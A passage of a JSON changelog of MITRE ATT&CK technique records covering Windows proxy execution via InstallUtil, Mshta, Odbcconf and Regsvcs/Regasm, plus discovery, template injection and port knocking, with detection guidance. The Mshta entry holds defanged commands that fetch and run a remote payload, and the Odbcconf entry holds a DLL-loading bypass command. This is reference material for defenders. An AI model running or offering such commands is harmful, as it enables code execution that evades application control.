(Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\\Windows\\Microsoft.NET\\Framework\\v\\InstallUtil.exe and C:\\Windows\\Microsoft.NET\\Framework64\\v\\InstallUtil.exe.\n\nInstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/004", + "external_id": "T1218.004" + }, + { + "source_name": "MSDN InstallUtil", + "description": "Microsoft. (n.d.). Installutil.exe (Installer Tool). Retrieved July 1, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/50614e95.aspx" + }, + { + "source_name": "LOLBAS Installutil", + "description": "LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Installutil/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire", + "Casey Smith" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. 
Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:46:11.581000+00:00\", \"old_value\": \"2025-04-15 19:58:17.302000+00:00\"}}}", + "previous_version": "2.1", + "changelog_mitigations": { + "shared": [ + "M1038: Execution Prevention", + "M1042: Disable or Remove Feature or Program" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--840a987a-99bd-4a80-a5c9-0cb2baa6cade", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-23 19:32:49.557000+00:00", + "modified": "2025-04-25 14:47:18.707000+00:00", + "name": "Mshta", + "description": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017) \n\nMshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. 
(Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe can be used to bypass application control solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/005", + "external_id": "T1218.005" + }, + { + "source_name": "Cylance Dust Storm", + "description": "Gross, J. (2016, February 23). Operation Dust Storm. Retrieved December 22, 2021.", + "url": "https://s7d2.scene7.com/is/content/cylance/prod/cylance-web/en-us/resources/knowledge-center/resource-library/reports/Op_Dust_Storm_Report.pdf" + }, + { + "source_name": "Red Canary HTA Abuse Part Deux", + "description": "McCammon, K. (2015, August 14). Microsoft HTML Application (HTA) Abuse, Part Deux. Retrieved October 27, 2017.", + "url": "https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/" + }, + { + "source_name": "FireEye Attacks Leveraging HTA", + "description": "Berry, A., Galang, L., Jiang, G., Leathery, J., Mohandas, R. (2017, April 11). CVE-2017-0199: In the Wild Attacks Leveraging HTA Handler. 
Retrieved October 27, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html" + }, + { + "source_name": "Airbus Security Kovter Analysis", + "description": "Dove, A. (2016, March 23). Fileless Malware \u2013 A Behavioural Analysis Of Kovter Persistence. Retrieved December 5, 2017.", + "url": "https://airbus-cyber-security.com/fileless-malware-behavioural-analysis-kovter-persistence/" + }, + { + "source_name": "FireEye FIN7 April 2017", + "description": "Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing LNK. Retrieved April 24, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html" + }, + { + "source_name": "Wikipedia HTML Application", + "description": "Wikipedia. (2017, October 14). HTML Application. Retrieved October 27, 2017.", + "url": "https://en.wikipedia.org/wiki/HTML_Application" + }, + { + "source_name": "MSDN HTML Applications", + "description": "Microsoft. (n.d.). HTML Applications. Retrieved October 27, 2017.", + "url": "https://msdn.microsoft.com/library/ms536471.aspx" + }, + { + "source_name": "LOLBAS Mshta", + "description": "LOLBAS. (n.d.). Mshta.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Mshta/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "@ionstorm", + "Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank", + "Ricardo Dias" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "File: File Creation", + "Command: Command Execution", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. 
Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.\n\nMonitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:18.707000+00:00\", \"old_value\": \"2025-04-15 19:58:47.701000+00:00\"}}}", + "previous_version": "2.1", + "changelog_mitigations": { + "shared": [ + "M1038: Execution Prevention", + "M1042: Disable or Remove Feature or Program" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0022: File (File Creation)", + "DS0029: Network Traffic (Network Connection Creation)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--6e3bd510-6b33-41a4-af80-2d80f3ee0071", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-24 15:01:32.917000+00:00", + "modified": "2025-04-25 14:47:01.231000+00:00", + "name": "Odbcconf", + "description": "Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. 
Odbcconf.exe is a Windows utility that allows you to configure Open Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) The Odbcconf.exe binary may be digitally signed by Microsoft.\n\nAdversaries may abuse odbcconf.exe to bypass application control solutions that do not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a REGSVR flag that can be misused to execute DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}). (Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group Nov 2017) \n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/008", + "external_id": "T1218.008" + }, + { + "source_name": "Microsoft odbcconf.exe", + "description": "Microsoft. (2017, January 18). ODBCCONF.EXE. Retrieved March 7, 2019.", + "url": "https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-2017" + }, + { + "source_name": "LOLBAS Odbcconf", + "description": "LOLBAS. (n.d.). Odbcconf.exe. Retrieved March 7, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/" + }, + { + "source_name": "TrendMicro Squiblydoo Aug 2017", + "description": "Bermejo, L., Giagone, R., Wu, R., and Yarochkin, F. (2017, August 7). Backdoor-carrying Emails Set Sights on Russian-speaking Businesses. Retrieved March 7, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/" + }, + { + "source_name": "TrendMicro Cobalt Group Nov 2017", + "description": "Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November 20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit Against Russian Banks. 
Retrieved March 7, 2019.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation", + "Module: Module Load" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:01.231000+00:00\", \"old_value\": \"2025-04-15 19:58:39.912000+00:00\"}}}", + "previous_version": "2.1", + "changelog_mitigations": { + "shared": [ + "M1038: Execution Prevention", + "M1042: Disable or Remove Feature or Program" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0011: Module (Module Load)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--c48a67ee-b657-45c1-91bf-6cdbe27205f8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-23 19:42:16.439000+00:00", + "modified": "2025-04-25 14:47:58.456000+00:00", + 
"name": "Regsvcs/Regasm", + "description": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)\n\nBoth utilities may be used to bypass application control through use of attributes within the binary to specify code that should be run before registration or unregistration: [ComRegisterFunction] or [ComUnregisterFunction] respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: LOLBAS Regasm)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1218/009", + "external_id": "T1218.009" + }, + { + "source_name": "MSDN Regsvcs", + "description": "Microsoft. (n.d.). Regsvcs.exe (.NET Services Installation Tool). Retrieved July 1, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/04za0hca.aspx" + }, + { + "source_name": "MSDN Regasm", + "description": "Microsoft. (n.d.). Regasm.exe (Assembly Registration Tool). Retrieved July 1, 2016.", + "url": "https://msdn.microsoft.com/en-us/library/tzat5yw6.aspx" + }, + { + "source_name": "LOLBAS Regsvcs", + "description": "LOLBAS. (n.d.). Regsvcs.exe. Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/" + }, + { + "source_name": "LOLBAS Regasm", + "description": "LOLBAS. (n.d.). Regasm.exe. 
Retrieved July 31, 2019.", + "url": "https://lolbas-project.github.io/lolbas/Binaries/Regasm/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Casey Smith" + ], + "x_mitre_data_sources": [ + "Command: Command Execution", + "Process: Process Creation" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:58.456000+00:00\", \"old_value\": \"2025-04-15 19:59:05.911000+00:00\"}}}", + "previous_version": "2.1", + "changelog_mitigations": { + "shared": [ + "M1038: Execution Prevention", + "M1042: Disable or Remove Feature or Program" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--c1b68a96-3c48-49ea-a6c0-9b27359f9c19", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-18 14:06:45.244000+00:00", + "modified": "2025-04-25 14:47:55.750000+00:00", + "name": "System 
Language Discovery", + "description": "Adversaries may attempt to gather information about the system language of a victim in order to infer the geographical location of that host. This information may be used to shape follow-on behaviors, including whether the adversary infects the target and/or attempts specific actions. This decision may be employed by malware developers and operators to reduce their risk of attracting the attention of specific law enforcement agencies or prosecution/scrutiny from other entities.(Citation: Malware System Language Check)\n\nThere are various sources of data an adversary could use to infer system language, such as system defaults and keyboard layouts. Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Query Registry](https://attack.mitre.org/techniques/T1012) and calls to [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: CrowdStrike Ryuk January 2019) \n\nFor example, on a Windows system adversaries may attempt to infer the language of a system by querying the registry key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language or parsing the outputs of Windows API functions GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetKeyboardLayoutList and GetUserDefaultLangID.(Citation: Darkside Ransomware Cybereason)(Citation: Securelist JSWorm)(Citation: SecureList SynAck Doppelg\u00e4nging May 2018)\n\nOn a macOS or Linux system, adversaries may query locale to retrieve the value of the $LANG environment variable.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1614/001", + "external_id": "T1614.001" + }, + { + "source_name": "Malware System Language Check", + "description": "Pierre-Marc Bureau. (2009, January 15). Malware Trying to Avoid Some Countries. 
Retrieved August 18, 2021.", + "url": "https://www.welivesecurity.com/2009/01/15/malware-trying-to-avoid-some-countries/" + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020.", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/" + }, + { + "source_name": "Darkside Ransomware Cybereason", + "description": "Cybereason Nocturnus. (2021, April 1). Cybereason vs. Darkside Ransomware. Retrieved August 18, 2021.", + "url": "https://www.cybereason.com/blog/cybereason-vs-darkside-ransomware" + }, + { + "source_name": "Securelist JSWorm", + "description": "Fedor Sinitsyn. (2021, May 25). Evolution of JSWorm Ransomware. Retrieved August 18, 2021.", + "url": "https://securelist.com/evolution-of-jsworm-ransomware/102428/" + }, + { + "source_name": "SecureList SynAck Doppelg\u00e4nging May 2018", + "description": "Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses the Doppelg\u00e4nging technique. Retrieved May 22, 2018.", + "url": "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Harshal Tupsamudre, Qualys" + ], + "x_mitre_data_sources": [ + "Process: Process Creation", + "Process: OS API Execution", + "Windows Registry: Windows Registry Key Access", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. 
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system language information. This may include calls to various API functions and interaction with system configuration settings such as the Windows Registry.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:47:55.750000+00:00\", \"old_value\": \"2025-04-15 19:59:04.692000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (OS API Execution)", + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)", + "DS0024: Windows Registry (Windows Registry Key Access)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-17 15:28:10.689000+00:00", + "modified": "2025-04-25 14:45:52.631000+00:00", + "name": "Internet Connection Discovery", + "description": "Adversaries may check for Internet connectivity on compromised systems. 
This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1016/001", + "external_id": "T1016.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. 
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to check Internet connectivity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS", + "ESXi" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:52.631000+00:00\", \"old_value\": \"2025-04-15 19:58:08.048000+00:00\"}}}", + "previous_version": "1.1", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0017: Command (Command Execution)" + ], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 15:16:15.516000+00:00", + "name": "Template Injection", + "description": "Adversaries may create or modify references in user document templates to conceal malicious code or force authentication attempts. For example, Microsoft\u2019s Office Open XML (OOXML) specification defines an XML-based format for Office documents (.docx, xlsx, .pptx) to replace older binary formats (.doc, .xls, .ppt). 
OOXML files are packed together ZIP archives compromised of various XML files, referred to as parts, containing properties that collectively define how a document is rendered.(Citation: Microsoft Open XML July 2017)\n\nProperties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded.\n\nAdversaries may abuse these templates to initially conceal malicious code to be executed via user documents. Template references injected into a document may enable malicious payloads to be fetched and executed when the document is loaded.(Citation: SANS Brian Wiltse Template Injection) These documents can be delivered via other techniques such as [Phishing](https://attack.mitre.org/techniques/T1566) and/or [Taint Shared Content](https://attack.mitre.org/techniques/T1080) and may evade static detections since no typical indicators (VBA macro, script, etc.) are present until after the malicious payload is fetched.(Citation: Redxorblue Remote Template Injection) Examples have been seen in the wild where template injection was used to load malicious code containing an exploit.(Citation: MalwareBytes Template Injection OCT 2017)\n\nAdversaries may also modify the *\\template control word within an .rtf file to similarly conceal then download malicious code. This legitimate control word value is intended to be a file destination of a template file resource that is retrieved and loaded when an .rtf file is opened. 
However, adversaries may alter the bytes of an existing .rtf file to insert a template control word field to include a URL resource of a malicious payload.(Citation: Proofpoint RTF Injection)(Citation: Ciberseguridad Decoding malicious RTF files)\n\nThis technique may also enable [Forced Authentication](https://attack.mitre.org/techniques/T1187) by injecting a SMB/HTTPS (or other credential prompting) URL and triggering an authentication attempt.(Citation: Anomali Template Injection MAR 2018)(Citation: Talos Template Injection July 2017)(Citation: ryhanson phishery SEPT 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1221", + "external_id": "T1221" + }, + { + "source_name": "Microsoft Open XML July 2017", + "description": "Microsoft. (2014, July 9). Introducing the Office (2007) Open XML File Formats. Retrieved July 20, 2018.", + "url": "https://docs.microsoft.com/previous-versions/office/developer/office-2007/aa338205(v=office.12)" + }, + { + "source_name": "SANS Brian Wiltse Template Injection", + "description": "Wiltse, B.. (2018, November 7). Template Injection Attacks - Bypassing Security Controls by Living off the Land. Retrieved April 10, 2019.", + "url": "https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780" + }, + { + "source_name": "Redxorblue Remote Template Injection", + "description": "Hawkins, J. (2018, July 18). Executing Macros From a DOCX With Remote Template Injection. Retrieved October 12, 2018.", + "url": "http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html" + }, + { + "source_name": "MalwareBytes Template Injection OCT 2017", + "description": "Segura, J. (2017, October 13). Decoy Microsoft Word document delivers malware through a RAT. 
Retrieved July 21, 2018.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/10/decoy-microsoft-word-document-delivers-malware-through-rat/" + }, + { + "source_name": "Proofpoint RTF Injection", + "description": "Raggi, M. (2021, December 1). Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption\u202fBeyond APT Actors\u202f. Retrieved December 9, 2021.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/injection-new-black-novel-rtf-template-inject-technique-poised-widespread" + }, + { + "source_name": "Ciberseguridad Decoding malicious RTF files", + "description": "Pedrero, R.. (2021, July). Decoding malicious RTF files. Retrieved November 16, 2021.", + "url": "https://ciberseguridad.blog/decodificando-ficheros-rtf-maliciosos/" + }, + { + "source_name": "Anomali Template Injection MAR 2018", + "description": "Intel_Acquisition_Team. (2018, March 1). Credential Harvesting and Malicious File Delivery using Microsoft Office Template Injection. Retrieved July 20, 2018.", + "url": "https://forum.anomali.com/t/credential-harvesting-and-malicious-file-delivery-using-microsoft-office-template-injection/2104" + }, + { + "source_name": "Talos Template Injection July 2017", + "description": "Baird, S. et al.. (2017, July 7). Attack on Critical Infrastructure Leverages Template Injection. Retrieved July 21, 2018.", + "url": "https://blog.talosintelligence.com/2017/07/template-injection.html" + }, + { + "source_name": "ryhanson phishery SEPT 2016", + "description": "Hanson, R. (2016, September 24). phishery. 
Retrieved July 21, 2018.", + "url": "https://github.com/ryhanson/phishery" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Michael Raggi @aRtAGGI", + "Brian Wiltse @evalstrings", + "Patrick Campbell, @pjcampbe11" + ], + "x_mitre_data_sources": [ + "Network Traffic: Network Connection Creation", + "Process: Process Creation", + "Network Traffic: Network Traffic Content" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze process behavior to determine if user document applications (such as Office) are performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.\n\nMonitor .rtf files for strings indicating the *\\template control word has been modified to retrieve a URL resource, such as *\\template http or *\\template \\u-.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.4", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:15.516000+00:00\", \"old_value\": \"2025-04-15 19:59:13.447000+00:00\"}}}", + "previous_version": "1.4", + "changelog_mitigations": { + "shared": [ + "M1017: User Training", + "M1031: Network Intrusion Prevention", + "M1042: Disable or Remove Feature or Program", + "M1049: Antivirus/Antimalware" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [ + "DS0009: Process (Process Creation)", + "DS0029: Network Traffic (Network Connection Creation)", + "DS0029: Network Traffic (Network Traffic Content)" + 
], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--8868cb5b-d575-4a60-acb2-07d37389a2fd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-01 18:23:25.002000+00:00", + "modified": "2025-04-25 14:47:21.421000+00:00", + "name": "Port Knocking", + "description": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.\n\nThis technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system.\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1205/001", + "external_id": "T1205.001" + }, + { + "source_name": "Hartrell cd00r 2002", + "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. 
